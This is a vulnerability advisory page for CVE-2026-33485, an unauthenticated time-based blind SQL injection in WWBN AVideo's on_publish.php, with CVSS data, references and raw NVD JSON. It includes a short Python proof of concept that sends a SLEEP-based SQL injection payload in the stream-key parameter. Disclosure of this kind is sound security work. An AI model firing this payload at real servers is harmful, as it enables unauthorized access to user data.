Security Vulnerability Report
CVE-2026-33485 CVSS 7.5 HIGH

CVE-2026-33485

Published: 2026-03-23 15:16:35
Last Modified: 2026-03-24 18:35:45

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the RTMP `on_publish` callback at `plugin/Live/on_publish.php` is accessible without authentication. The `$_POST['name']` parameter (stream key) is interpolated directly into SQL queries in two locations — `LiveTransmitionHistory::getLatest()` and `LiveTransmition::keyExists()` — without parameterized binding or escaping. An unauthenticated attacker can exploit time-based blind SQL injection to extract all database contents including user password hashes, email addresses, and other sensitive data. Commit af59eade82de645b20183cc3d74467a7eac76549 contains a patch.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# Target URL
# Replace with the actual target URL
target_url = "http://example.com/plugin/Live/on_publish.php"

# Payload for time-based blind SQL injection
# This payload attempts to cause a delay of 5 seconds if the condition is true
payload = {
    "name": "' OR (SELECT SLEEP(5))-- -"
}

try:
    print("[*] Sending payload to target...")
    start_time = time.time()
    response = requests.post(target_url, data=payload, timeout=10)
    end_time = time.time()
    elapsed_time = end_time - start_time

    if elapsed_time >= 5:
        print(f"[+] Vulnerability confirmed! Response took {elapsed_time:.2f} seconds.")
    else:
        print(f"[-] Vulnerability not detected or patched. Response took {elapsed_time:.2f} seconds.")
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")
```

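References

https://github.com/WWBN/AVideo/commit/af59eade82de645b20183cc3d74467a7eac76549 - Patch
https://github.com/WWBN/AVideo/security/advisories/GHSA-8p58-35c3-ccxx - Exploit, Mitigation, Vendor Advisory
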
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-33485", "sourceIdentifier": "[email protected]", "published": "2026-03-23T15:16:34.887", "lastModified": "2026-03-24T18:35:45.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the RTMP `on_publish` callback at `plugin/Live/on_publish.php` is accessible without authentication. The `$_POST['name']` parameter (stream key) is interpolated directly into SQL queries in two locations — `LiveTransmitionHistory::getLatest()` and `LiveTransmition::keyExists()` — without parameterized binding or escaping. An unauthenticated attacker can exploit time-based blind SQL injection to extract all database contents including user password hashes, email addresses, and other sensitive data. Commit af59eade82de645b20183cc3d74467a7eac76549 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el callback RTMP 'on_publish' en 'plugin/Live/on_publish.php' es accesible sin autenticación. El parámetro '$_POST['name']' (clave de transmisión) se interpola directamente en consultas SQL en dos ubicaciones — 'LiveTransmitionHistory::getLatest()' y 'LiveTransmition::keyExists()' — sin enlace parametrizado ni escape. Un atacante no autenticado puede explotar una inyección SQL ciega basada en tiempo para extraer todo el contenido de la base de datos, incluyendo hashes de contraseñas de usuarios, direcciones de correo electrónico y otros datos sensibles. El commit af59eade82de645b20183cc3d74467a7eac76549 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/af59eade82de645b20183cc3d74467a7eac76549", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8p58-35c3-ccxx", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
```